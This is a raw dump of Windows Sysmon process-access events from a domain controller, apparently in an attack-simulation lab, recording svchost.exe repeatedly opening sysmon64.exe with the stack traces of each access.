10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001494Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001493Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001492Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001491Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001490Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001489Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001488Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001487Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001486Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001485Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001484Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001483Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001482Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001481Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001480Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001479Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001478Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001477Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001476Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001475Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001474Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001473Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001472Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001471Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 